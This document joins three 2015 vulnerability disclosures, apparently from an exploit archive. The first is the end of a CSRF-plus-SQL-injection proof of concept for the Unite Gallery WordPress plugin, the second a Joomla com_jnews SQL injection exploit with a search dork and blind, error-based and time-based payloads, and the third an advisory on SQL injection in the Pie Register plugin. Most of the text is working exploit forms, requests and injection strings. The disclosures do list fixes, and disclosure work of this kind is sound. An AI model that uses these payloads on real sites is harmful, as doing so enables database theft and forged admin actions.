<input type="hidden" name="data[params][tile_textpanel_bg_opacity]"
value='0.6' />
<input type="hidden" name="data[params][tile_textpanel_title_color]"
value='#ffffff' />
<input type="hidden" name="data[params][tile_textpanel_title_text_align]"
value='left' />
<input type="hidden" name="data[params][tile_textpanel_title_font_size]"
value='14' />
<input type="hidden" name="data[params][tile_textpanel_title_bold]"
value='true' />
<input type="hidden" name="data[params][lightbox_type]" value='wide' />
<input type="hidden" name="data[params][lightbox_hide_arrows_onvideoplay]"
value='true' />
<input type="hidden" name="data[params][lightbox_slider_control_zoom]"
value='true' />
<input type="hidden" name="data[params][gallery_mousewheel_role]"
value='zoom' />
<input type="hidden" name="data[params][lightbox_overlay_opacity]"
value='1' />
<input type="hidden" name="data[params][lightbox_overlay_color]"
value='#000000' />
<input type="hidden" name="data[params][lightbox_top_panel_opacity]"
value='0.4' />
<input type="hidden" name="data[params][lightbox_show_numbers]"
value='true' />
<input type="hidden" name="data[params][lightbox_numbers_size]" value='14'
/>
<input type="hidden" name="data[params][lightbox_numbers_color]"
value='#e5e5e5' />
<input type="hidden" name="data[params][lightbox_show_textpanel]"
value='true' />
<input type="hidden" name="data[params][lightbox_textpanel_width]"
value='550' />
<input type="hidden" name="data[params][lightbox_textpanel_source]"
value='title' />
<input type="hidden" name="data[params][lightbox_textpanel_title_color]"
value='#e5e5e5' />
<input type="hidden"
name="data[params][lightbox_textpanel_title_text_align]" value='left' />
<input type="hidden"
name="data[params][lightbox_textpanel_title_font_size]" value='14' />
<input type="hidden" name="data[params][lightbox_textpanel_title_bold]"
value='false' />
<input type="hidden" name="data[params][lightbox_compact_overlay_opacity]"
value='0.6' />
<input type="hidden" name="data[params][lightbox_compact_overlay_color]"
value='#000000' />
<input type="hidden" name="data[params][lightbox_arrows_position]"
value='sides' />
<input type="hidden" name="data[params][lightbox_arrows_inside_alwayson]"
value='false' />
<input type="hidden" name="data[params][lightbox_compact_show_numbers]"
value='true' />
<input type="hidden" name="data[params][lightbox_compact_numbers_size]"
value='14' />
<input type="hidden" name="data[params][lightbox_compact_numbers_color]"
value='#e5e5e5' />
<input type="hidden"
name="data[params][lightbox_compact_numbers_padding_top]" value='7' />
<input type="hidden"
name="data[params][lightbox_compact_numbers_padding_right]" value='5' />
<input type="hidden" name="data[params][lightbox_compact_show_textpanel]"
value='true' />
<input type="hidden" name="data[params][lightbox_compact_textpanel_source]"
value='title' />
<input type="hidden"
name="data[params][lightbox_compact_textpanel_title_color]" value='#e5e5e5'
/>
<input type="hidden"
name="data[params][lightbox_compact_textpanel_title_font_size]" value='14'
/>
<input type="hidden"
name="data[params][lightbox_compact_textpanel_title_bold]" value='false' />
<input type="hidden"
name="data[params][lightbox_compact_textpanel_padding_top]" value='5' />
<input type="hidden"
name="data[params][lightbox_compact_textpanel_padding_left]" value='10' />
<input type="hidden"
name="data[params][lightbox_compact_textpanel_padding_right]" value='10' />
<input type="hidden"
name="data[params][lightbox_compact_slider_image_border]" value='true' />
<input type="hidden"
name="data[params][lightbox_compact_slider_image_border_width]" value='10'
/>
<input type="hidden"
name="data[params][lightbox_compact_slider_image_border_color]"
value='#ffffff' />
<input type="hidden"
name="data[params][lightbox_compact_slider_image_border_radius]" value='0'
/>
<input type="hidden"
name="data[params][lightbox_compact_slider_image_shadow]" value='true' />
<input type="hidden" name="data[params][include_jquery]" value='true' />
<input type="hidden" name="data[params][js_to_body]" value='false' />
<input type="hidden" name="data[params][compress_output]" value='false' />
<input type="hidden" name="data[params][gallery_debug_errors]"
value='false' />
 
<!-- SQLi -->
<input type="hidden" name="data[galleryID]" value='1 AND (SELECT * FROM
(SELECT(SLEEP(5)))rock)' />
<input type="submit" value="submit" />
</form>
 
<p>CSRF - Add Items</p>
<form action="http://localhost/wp-admin/admin-ajax.php" method="post">
<input type="hidden" name="action" value='unitegallery_ajax_action' />
<input type="hidden" name="client_action" value='add_item' />
<input type="hidden" name="gallery_type" value='' />
<input type="hidden" name="data[type]" value='html5video' />
<input type="hidden" name="data[title]" value='test' />
<input type="hidden" name="data[description]" value='' />
<input type="hidden" name="data[urlImage]" value='' />
<input type="hidden" name="data[urlThumb]" value='' />
<input type="hidden" name="data[urlVideo_mp4]" value='
http://video-js.zencoder.com/oceans-clip.mp4' />
<input type="hidden" name="data[urlVideo_webm]" value='
http://video-js.zencoder.com/oceans-clip.webm' />
<input type="hidden" name="data[urlVideo_ogv]" value='
http://video-js.zencoder.com/oceans-clip.ogv' />
<input type="hidden" name="data[catID]" value='4' />
<input type="submit" value="submit" />
</form>
 
<p>CSRF + SQLi - Retrieve Items (Edit Settings - Items Tab)</p>
<form action="http://localhost/wp-admin/admin-ajax.php" method="post">
<input type="hidden" name="action" value='unitegallery_ajax_action' />
<input type="hidden" name="client_action" value='get_cat_items' />
<input type="hidden" name="gallery_type" value='ug-carousel' />
<input type="hidden" name="data[catID]" value='3' />
 
<!-- SQLi -->
<input type="hidden" name="data[galleryID]" value='1 AND (SELECT * FROM
(SELECT(SLEEP(5)))rock)' />
<input type="submit" value="submit" />
</form>
 
<p> CSRF + SQLi - Action buttons</p>
<ul>
<li>
<a href="
http://localhost/wp-admin/admin.php?page=unitegallery&view=items&galleryid=1%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))rock)
">
http://localhost/wp-admin/admin.php?page=unitegallery&view=items&galleryid=1%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))rock)
</a></li>
<li>
<a href="
http://localhost/wp-admin/admin.php?page=unitegallery&view=preview&id=1%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))rock)
">
http://localhost/wp-admin/admin.php?page=unitegallery&view=preview&id=1%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))rock)
</a>
</li>
</ul>
</body>
</html>
 
## Solution:
 
Upgrade to v1.5 or higher
 
## Disclosure Timeline:
 
2015-06-06 - Discovered. Reported to developer.
2015-06-10 - Updated version released.
2015-07-25 - Publishing disclosure on FD mailing list
 
## Disclaimer:
 
This disclosure is purely meant for educational purposes. I will in no way
be responsible as to how the information in this disclosure is used.

# Description of the component:
Reach, engage and delight more customers with newsletters, auto-responders or campaign management.
 
##################################################################################################
# Exploit Title: [Joomla component com_jnews - SQL injection]
# Google Dork: [inurl:option=com_jnews]
# Date: [2015-10-29]
# Exploit Author: [Omer Ramić]
# Twitter: https://twitter.com/sp_omer
# Vendor Homepage: [http://www.joobi.co/]
# Software Link: [http://www.joobi.co/index.php?option=com_content&view=article&id=8652&Itemid=3031]
# Version: [8.5.1] & probably all prior
# Tested on: Linux/Windows/PHP 5.5.28/Apache 2.4.16
##################################################################################################
 
#Vulnerable POST parameter:
Parameter_1: sub_list_id[1] (This parametar needs to be encoded when exploited as: sub_list_id%5B1%5D)
 
#The vulnerable parameter is within the following request:
 
POST /joomlatest/index.php?option=com_jnews HTTP/1.1
Host: 192.168.0.10
User-Agent: Hidden-user-agent-version
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer:
http://192.168.0.10/joomlatest/index.php?option=com_jnews&view=subscribe&act=subone&Itemid=206
Cookie:
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 318
 
Itemid=188&name=asdf&email=asdf%40asdf.com
&receive_html=0&timezone=00%3A00%3A00&confirmed=1&subscribed%5B1%5D=0&sub_list_id%5B1%5D=1&acc_level%5B1%5D=29&passwordA=0oYmqypNqP6eU&fromFrontend=1&act=subscribe&subscriber_id=0&user_id=0&option=com_jnews&task=save&boxchecked=0&Itemid=188&d65abd4ca0e24f5d3e5af6b5c390ae17=1
 
 
#Vector:
sub_list_id%5B1%5D=1[SQLi]
 
 
POC_1: boolean-based blind
Itemid=188&name=asdf&email=asdf@asdf.com&receive_html=0&timezone=00:00:00&confirmed=1&subscribed[1]=0&sub_list_id[1]=1
RLIKE (SELECT (CASE WHEN (7097=7097) THEN 1 ELSE 0x28
END))&acc_level[1]=29&passwordA=0oYmqypNqP6eU&fromFrontend=1&act=subscribe&subscriber_id=0&user_id=0&option=com_jnews&task=save&boxchecked=0&Itemid=188&d65abd4ca0e24f5d3e5af6b5c390ae17=1
 
POC_2: error-based
Itemid=188&name=asdf&email=asdf@asdf.com&receive_html=0&timezone=00:00:00&confirmed=1&subscribed[1]=0&sub_list_id[1]=1
AND EXTRACTVALUE(8483,CONCAT(0x5c,0x716b787671,(SELECT
(ELT(8483=8483,1))),0x716b786b71))&acc_level[1]=29&passwordA=0oYmqypNqP6eU&fromFrontend=1&act=subscribe&subscriber_id=0&user_id=0&option=com_jnews&task=save&boxchecked=0&Itemid=188&d65abd4ca0e24f5d3e5af6b5c390ae17=1
 
POC_3: AND/OR time-based blind
Itemid=188&name=asdf&email=asdf@asdf.com&receive_html=0&timezone=00:00:00&confirmed=1&subscribed[1]=0&sub_list_id[1]=(SELECT
* FROM
(SELECT(SLEEP(5)))Qrax)&acc_level[1]=29&passwordA=0oYmqypNqP6eU&fromFrontend=1&act=subscribe&subscriber_id=0&user_id=0&option=com_jnews&task=save&boxchecked=0&Itemid=188&d65abd4ca0e24f5d3e5af6b5c390ae17=1
 
 
 
###################################
# Greets to Palestine from Bosnia          #
###################################
 
Good Luck ^__^

Details
================
Software: Pie Register
Version: 2.0.18
Homepage: https://github.com/GTSolutions/Pie-Register
CVE: CVE-2015-7682 (Pending)
CVSS: 3.5 (Low; AV:N/AC:M/Au:S/C:P/I:N/A:N)
CWE: CWE-89
 
Description
================
Two blind SQL injection vulnerabilities in Pie Register 2.0.18 allow SQL injection by admins leading to loss of database confidentiality. Pie Register is a WordPress plugin with over 10,000 active installs.
 
Vulnerabilities
================
The vulnerabilities are due to the unsanitized POST parameters invitaion_code_bulk_option and invi_del_id:
 
Injection 1:
>From  pie-register/pie-register.php:
576: $this->delete_invitation_codes($_POST['select_invitaion_code_bulk_option']);
. . .
3521: $sql = "DELETE FROM `$codetable` WHERE `id` IN ( ".$ids." )";
 
Injection 2:
>From pie-register/pie-register.php:
1941: if($wpdb->query("DELETE FROM ".$codetable." WHERE id = ".$_POST['invi_del_id']))
 
Proof of concept
================
URL: http://localhost/wordpress/wp-admin/admin.php?page=pie-invitation-codes
 
Injection 1:
POST data:
select_invitaion_code_bulk_option=1)%20OR%20SLEEP(15)%3d0%20LIMIT%201--&invitaion_code_bulk_option=delete&btn_submit_invitaion_code_bulk_option=Apply
 
Injection 2:
POST data:
piereg_invitation_nonce=66e7e6383d&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Fadmin.php%3Fpage%3Dpie-invitation-codes&invi_del_id=1%20OR%20SLEEP(15)%3d0%20LIMIT%201--
 
Remediation
================
Upgrade the plugin to version 2.0.19 or higher.
 
Timeline
================
2015-09-23: Discovered
2015-09-24: Contacted vendor via website support form
2015-09-28: Vendor supplied security contact email
2015-09-28: Requested CVE
2015-09-30: Report sent to vendor and wordpress.org
2015-10-02: Vendor releases version 2.0.19 on Github - confirmed fixed
2015-10-12: Public Disclosure
 
References
================
[1] http://codex.wordpress.org/Class_Reference/wpdb#Protect_Queries_Against_SQL_Injection_Attacks
 
Discovered by
================
David Moore @grajagandev